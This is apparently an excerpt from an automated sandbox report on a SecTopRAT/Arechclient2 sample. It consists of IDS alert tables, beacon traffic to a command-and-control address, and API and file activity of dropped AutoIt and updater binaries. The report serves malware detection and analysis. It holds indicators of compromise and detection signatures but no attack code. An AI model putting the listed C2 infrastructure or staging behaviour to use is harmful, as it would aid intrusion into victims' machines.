                    2024-12-17T08:36:53.521577+010020522481A Network Trojan was detected192.168.2.849863185.147.124.2369000TCP
                    2024-12-17T08:36:55.063315+010020522481A Network Trojan was detected192.168.2.849864185.147.124.2369000TCP
                    2024-12-17T08:36:56.599668+010020522481A Network Trojan was detected192.168.2.849865185.147.124.2369000TCP
                    2024-12-17T08:36:58.131971+010020522481A Network Trojan was detected192.168.2.849866185.147.124.2369000TCP
                    2024-12-17T08:36:59.663742+010020522481A Network Trojan was detected192.168.2.849867185.147.124.2369000TCP
                    2024-12-17T08:37:01.196515+010020522481A Network Trojan was detected192.168.2.849869185.147.124.2369000TCP
                    2024-12-17T08:37:02.738241+010020522481A Network Trojan was detected192.168.2.849870185.147.124.2369000TCP
                    2024-12-17T08:37:04.286240+010020522481A Network Trojan was detected192.168.2.849871185.147.124.2369000TCP
                    2024-12-17T08:37:05.837093+010020522481A Network Trojan was detected192.168.2.849872185.147.124.2369000TCP
                    2024-12-17T08:37:07.408010+010020522481A Network Trojan was detected192.168.2.849873185.147.124.2369000TCP
                    2024-12-17T08:37:08.945298+010020522481A Network Trojan was detected192.168.2.849874185.147.124.2369000TCP
                    2024-12-17T08:37:10.485188+010020522481A Network Trojan was detected192.168.2.849876185.147.124.2369000TCP
                    2024-12-17T08:37:12.031461+010020522481A Network Trojan was detected192.168.2.849877185.147.124.2369000TCP
                    2024-12-17T08:37:13.587050+010020522481A Network Trojan was detected192.168.2.849878185.147.124.2369000TCP
                    2024-12-17T08:37:15.115646+010020522481A Network Trojan was detected192.168.2.849879185.147.124.2369000TCP
                    2024-12-17T08:37:16.678893+010020522481A Network Trojan was detected192.168.2.849880185.147.124.2369000TCP
                    2024-12-17T08:37:18.211308+010020522481A Network Trojan was detected192.168.2.849881185.147.124.2369000TCP
                    2024-12-17T08:37:19.741494+010020522481A Network Trojan was detected192.168.2.849882185.147.124.2369000TCP
                    2024-12-17T08:37:21.276088+010020522481A Network Trojan was detected192.168.2.849883185.147.124.2369000TCP
                    2024-12-17T08:37:22.802400+010020522481A Network Trojan was detected192.168.2.849884185.147.124.2369000TCP
                    2024-12-17T08:37:24.343196+010020522481A Network Trojan was detected192.168.2.849885185.147.124.2369000TCP
                    2024-12-17T08:37:25.951660+010020522481A Network Trojan was detected192.168.2.849886185.147.124.2369000TCP
                    2024-12-17T08:37:27.507786+010020522481A Network Trojan was detected192.168.2.849887185.147.124.2369000TCP
                    2024-12-17T08:37:29.047895+010020522481A Network Trojan was detected192.168.2.849888185.147.124.2369000TCP
                    2024-12-17T08:37:30.594093+010020522481A Network Trojan was detected192.168.2.849889185.147.124.2369000TCP
                    2024-12-17T08:37:32.146121+010020522481A Network Trojan was detected192.168.2.849890185.147.124.2369000TCP
                    2024-12-17T08:37:33.681885+010020522481A Network Trojan was detected192.168.2.849891185.147.124.2369000TCP
                    2024-12-17T08:37:35.220812+010020522481A Network Trojan was detected192.168.2.849892185.147.124.2369000TCP
                    2024-12-17T08:37:36.821247+010020522481A Network Trojan was detected192.168.2.849894185.147.124.2369000TCP
                    2024-12-17T08:37:38.359373+010020522481A Network Trojan was detected192.168.2.849895185.147.124.2369000TCP
                    2024-12-17T08:37:39.908443+010020522481A Network Trojan was detected192.168.2.849896185.147.124.2369000TCP
                    2024-12-17T08:37:41.452702+010020522481A Network Trojan was detected192.168.2.849897185.147.124.2369000TCP
                    2024-12-17T08:37:43.002700+010020522481A Network Trojan was detected192.168.2.849898185.147.124.2369000TCP
                    2024-12-17T08:37:44.595030+010020522481A Network Trojan was detected192.168.2.849899185.147.124.2369000TCP
                    2024-12-17T08:37:46.132367+010020522481A Network Trojan was detected192.168.2.849901185.147.124.2369000TCP
                    2024-12-17T08:37:47.675621+010020522481A Network Trojan was detected192.168.2.849903185.147.124.2369000TCP
                    2024-12-17T08:37:49.218112+010020522481A Network Trojan was detected192.168.2.849904185.147.124.2369000TCP
                    2024-12-17T08:37:50.766702+010020522481A Network Trojan was detected192.168.2.849905185.147.124.2369000TCP
                    2024-12-17T08:37:52.314743+010020522481A Network Trojan was detected192.168.2.849906185.147.124.2369000TCP
                    2024-12-17T08:37:53.858141+010020522481A Network Trojan was detected192.168.2.849907185.147.124.2369000TCP
                    2024-12-17T08:37:55.425595+010020522481A Network Trojan was detected192.168.2.849909185.147.124.2369000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T08:34:09.221527+010028033053Unknown Traffic192.168.2.849715142.250.181.142443TCP
                    2024-12-17T08:34:14.622707+010028033053Unknown Traffic192.168.2.849724142.250.181.142443TCP
                    2024-12-17T08:34:17.475257+010028033053Unknown Traffic192.168.2.849727142.250.181.142443TCP
                    2024-12-17T08:34:19.975818+010028033053Unknown Traffic192.168.2.849731172.217.19.228443TCP
                    2024-12-17T08:34:22.967719+010028033053Unknown Traffic192.168.2.849732142.250.181.142443TCP
                    2024-12-17T08:34:25.891914+010028033053Unknown Traffic192.168.2.849733142.250.181.142443TCP
                    2024-12-17T08:34:28.460087+010028033053Unknown Traffic192.168.2.849734172.217.19.228443TCP
                    2024-12-17T08:34:31.406637+010028033053Unknown Traffic192.168.2.849736142.250.181.142443TCP
                    2024-12-17T08:34:34.302972+010028033053Unknown Traffic192.168.2.849738142.250.181.142443TCP
                    2024-12-17T08:34:34.693775+010028033053Unknown Traffic192.168.2.849740185.147.124.2369000TCP
                    2024-12-17T08:34:36.242251+010028033053Unknown Traffic192.168.2.849742185.147.124.2369000TCP
                    2024-12-17T08:34:36.818711+010028033053Unknown Traffic192.168.2.849741172.217.19.228443TCP
                    2024-12-17T08:34:37.823274+010028033053Unknown Traffic192.168.2.849743185.147.124.2369000TCP
                    2024-12-17T08:34:39.357777+010028033053Unknown Traffic192.168.2.849745185.147.124.2369000TCP
                    2024-12-17T08:34:39.718713+010028033053Unknown Traffic192.168.2.849744142.250.181.142443TCP
                    2024-12-17T08:34:42.737623+010028033053Unknown Traffic192.168.2.849747142.250.181.142443TCP
                    2024-12-17T08:34:44.175677+010028033053Unknown Traffic192.168.2.849749185.147.124.2369000TCP
                    2024-12-17T08:34:45.243941+010028033053Unknown Traffic192.168.2.849750172.217.19.228443TCP
                    2024-12-17T08:34:45.718296+010028033053Unknown Traffic192.168.2.849751185.147.124.2369000TCP
                    2024-12-17T08:34:47.449835+010028033053Unknown Traffic192.168.2.849753185.147.124.2369000TCP
                    2024-12-17T08:34:48.424823+010028033053Unknown Traffic192.168.2.849752142.250.181.142443TCP
                    2024-12-17T08:34:48.984297+010028033053Unknown Traffic192.168.2.849754185.147.124.2369000TCP
                    2024-12-17T08:34:50.547762+010028033053Unknown Traffic192.168.2.849756185.147.124.2369000TCP
                    2024-12-17T08:34:51.393206+010028033053Unknown Traffic192.168.2.849755142.250.181.142443TCP
                    2024-12-17T08:34:53.631234+010028033053Unknown Traffic192.168.2.849760185.147.124.2369000TCP
                    2024-12-17T08:34:53.889131+010028033053Unknown Traffic192.168.2.849759172.217.19.228443TCP
                    2024-12-17T08:34:55.171539+010028033053Unknown Traffic192.168.2.849761185.147.124.2369000TCP
                    2024-12-17T08:34:56.826252+010028033053Unknown Traffic192.168.2.849762142.250.181.142443TCP
                    2024-12-17T08:34:58.333058+010028033053Unknown Traffic192.168.2.849765185.147.124.2369000TCP
                    2024-12-17T08:34:59.779048+010028033053Unknown Traffic192.168.2.849764142.250.181.142443TCP
                    2024-12-17T08:34:59.874885+010028033053Unknown Traffic192.168.2.849766185.147.124.2369000TCP
                    2024-12-17T08:35:01.421903+010028033053Unknown Traffic192.168.2.849768185.147.124.2369000TCP
                    2024-12-17T08:35:02.298748+010028033053Unknown Traffic192.168.2.849767172.217.19.228443TCP
                    2024-12-17T08:35:04.520296+010028033053Unknown Traffic192.168.2.849771185.147.124.2369000TCP
                    2024-12-17T08:35:05.065150+010028033053Unknown Traffic192.168.2.849770142.250.181.142443TCP
                    2024-12-17T08:35:06.114616+010028033053Unknown Traffic192.168.2.849772185.147.124.2369000TCP
                    2024-12-17T08:35:07.864380+010028033053Unknown Traffic192.168.2.849773142.250.181.142443TCP
                    2024-12-17T08:35:09.517317+010028033053Unknown Traffic192.168.2.849775185.147.124.2369000TCP
                    2024-12-17T08:35:10.560331+010028033053Unknown Traffic192.168.2.849776172.217.19.228443TCP
                    2024-12-17T08:35:13.382221+010028033053Unknown Traffic192.168.2.849778142.250.181.142443TCP
                    2024-12-17T08:35:15.662917+010028033053Unknown Traffic192.168.2.849782185.147.124.2369000TCP
                    2024-12-17T08:35:16.812677+010028033053Unknown Traffic192.168.2.849781142.250.181.142443TCP
                    2024-12-17T08:35:18.796602+010028033053Unknown Traffic192.168.2.849785185.147.124.2369000TCP
                    2024-12-17T08:35:19.304560+010028033053Unknown Traffic192.168.2.849784172.217.19.228443TCP
                    2024-12-17T08:35:20.394494+010028033053Unknown Traffic192.168.2.849786185.147.124.2369000TCP
                    2024-12-17T08:35:22.170315+010028033053Unknown Traffic192.168.2.849787142.250.181.142443TCP
                    2024-12-17T08:35:24.915118+010028033053Unknown Traffic192.168.2.849790142.250.181.142443TCP
                    2024-12-17T08:35:24.995945+010028033053Unknown Traffic192.168.2.849791185.147.124.2369000TCP
                    2024-12-17T08:35:27.408469+010028033053Unknown Traffic192.168.2.849792172.217.19.228443TCP
                    2024-12-17T08:35:30.370072+010028033053Unknown Traffic192.168.2.849795142.250.181.142443TCP
                    2024-12-17T08:35:32.686688+010028033053Unknown Traffic192.168.2.849799185.147.124.2369000TCP
                    2024-12-17T08:35:33.693496+010028033053Unknown Traffic192.168.2.849798142.250.181.142443TCP
                    2024-12-17T08:35:34.235163+010028033053Unknown Traffic192.168.2.849800185.147.124.2369000TCP
                    2024-12-17T08:35:36.192186+010028033053Unknown Traffic192.168.2.849801172.217.19.228443TCP
                    2024-12-17T08:35:38.941928+010028033053Unknown Traffic192.168.2.849805185.147.124.2369000TCP
                    2024-12-17T08:35:39.004599+010028033053Unknown Traffic192.168.2.849804142.250.181.142443TCP
                    2024-12-17T08:35:40.487364+010028033053Unknown Traffic192.168.2.849807185.147.124.2369000TCP
                    2024-12-17T08:35:41.891288+010028033053Unknown Traffic192.168.2.849806142.250.181.142443TCP
                    2024-12-17T08:35:45.115542+010028033053Unknown Traffic192.168.2.849812185.147.124.2369000TCP
                    2024-12-17T08:35:48.236074+010028033053Unknown Traffic192.168.2.849814185.147.124.2369000TCP
                    2024-12-17T08:35:53.074335+010028033053Unknown Traffic192.168.2.849820185.147.124.2369000TCP
                    2024-12-17T08:35:54.619267+010028033053Unknown Traffic192.168.2.849821185.147.124.2369000TCP
                    2024-12-17T08:35:56.162527+010028033053Unknown Traffic192.168.2.849823185.147.124.2369000TCP
                    2024-12-17T08:35:57.718723+010028033053Unknown Traffic192.168.2.849824185.147.124.2369000TCP
                    2024-12-17T08:36:00.896918+010028033053Unknown Traffic192.168.2.849826185.147.124.2369000TCP
                    2024-12-17T08:36:02.428760+010028033053Unknown Traffic192.168.2.849828185.147.124.2369000TCP
                    2024-12-17T08:36:08.583865+010028033053Unknown Traffic192.168.2.849832185.147.124.2369000TCP
                    2024-12-17T08:36:14.777800+010028033053Unknown Traffic192.168.2.849836185.147.124.2369000TCP
                    2024-12-17T08:36:17.854514+010028033053Unknown Traffic192.168.2.849838185.147.124.2369000TCP
                    2024-12-17T08:36:20.914576+010028033053Unknown Traffic192.168.2.849840185.147.124.2369000TCP
                    2024-12-17T08:36:22.444819+010028033053Unknown Traffic192.168.2.849841185.147.124.2369000TCP
                    2024-12-17T08:36:25.507128+010028033053Unknown Traffic192.168.2.849843185.147.124.2369000TCP
                    2024-12-17T08:36:31.655489+010028033053Unknown Traffic192.168.2.849847185.147.124.2369000TCP
                    2024-12-17T08:36:33.274481+010028033053Unknown Traffic192.168.2.849848185.147.124.2369000TCP
                    2024-12-17T08:36:39.454998+010028033053Unknown Traffic192.168.2.849852185.147.124.2369000TCP
                    2024-12-17T08:36:40.992511+010028033053Unknown Traffic192.168.2.849853185.147.124.2369000TCP
                    2024-12-17T08:36:42.523013+010028033053Unknown Traffic192.168.2.849854185.147.124.2369000TCP
                    2024-12-17T08:36:50.459046+010028033053Unknown Traffic192.168.2.849861185.147.124.2369000TCP
                    2024-12-17T08:37:01.196515+010028033053Unknown Traffic192.168.2.849869185.147.124.2369000TCP
                    2024-12-17T08:37:05.837093+010028033053Unknown Traffic192.168.2.849872185.147.124.2369000TCP
                    2024-12-17T08:37:08.945298+010028033053Unknown Traffic192.168.2.849874185.147.124.2369000TCP
                    2024-12-17T08:37:13.587050+010028033053Unknown Traffic192.168.2.849878185.147.124.2369000TCP
                    2024-12-17T08:37:25.951660+010028033053Unknown Traffic192.168.2.849886185.147.124.2369000TCP
                    2024-12-17T08:37:27.507786+010028033053Unknown Traffic192.168.2.849887185.147.124.2369000TCP
                    2024-12-17T08:37:35.220812+010028033053Unknown Traffic192.168.2.849892185.147.124.2369000TCP
                    2024-12-17T08:37:41.452702+010028033053Unknown Traffic192.168.2.849897185.147.124.2369000TCP
                    2024-12-17T08:37:44.595030+010028033053Unknown Traffic192.168.2.849899185.147.124.2369000TCP
                    2024-12-17T08:37:47.675621+010028033053Unknown Traffic192.168.2.849903185.147.124.2369000TCP
                    2024-12-17T08:37:49.218112+010028033053Unknown Traffic192.168.2.849904185.147.124.2369000TCP
                    2024-12-17T08:37:52.314743+010028033053Unknown Traffic192.168.2.849906185.147.124.2369000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T08:34:17.122224+010028032742Potentially Bad Traffic192.168.2.849728104.21.87.65443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for domain / URL
                    Source: nopaste.netVirustotal: Detection: 14%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49790 version: TLS 1.2
                    Source: Binary string: l\System.pdbuPH source: powershell.exe, 00000002.00000002.2558487594.00000000072C0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: em.pdb source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2530957813.0000000000D78000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_01024005
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0102C2FF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102494A GetFileAttributesW,FindFirstFileW,FindClose,14_2_0102494A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102CD14 FindFirstFileW,FindClose,14_2_0102CD14
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0102CD9F
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0102F5D8
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0102F735
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0102FA36
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01023CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_01023CE2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F53CD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,14_2_015F53CD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F54D5 FindFirstFileA,GetLastError,14_2_015F54D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F2CFD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_015F2CFD
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00A04005
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00A0C2FF
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_00A0494A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00A0CD9F
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0CD14 FindFirstFileW,FindClose,16_2_00A0CD14
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00A0F5D8
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00A0F735
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00A0FA36
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00A03CE2
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_01093125 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_01093125
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_0109322D FindFirstFileA,GetLastError,16_2_0109322D
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_01090A55 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_01090A55
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\Bcp47Langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_0538D7EB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0712DA3Dh15_2_0712D3CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0712DA3Dh15_2_0712DA19

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49735 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49735
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49749 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49737 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49751 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49739 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49753 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49745 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49742 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49740 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49746 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49754 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49763 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49761 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49760 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49757 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49743 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49756 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49765 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49772 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49766 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49748 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49771 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49769 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49768 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49774 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49775 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49783 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49788 -> 185.147.124.236:9000
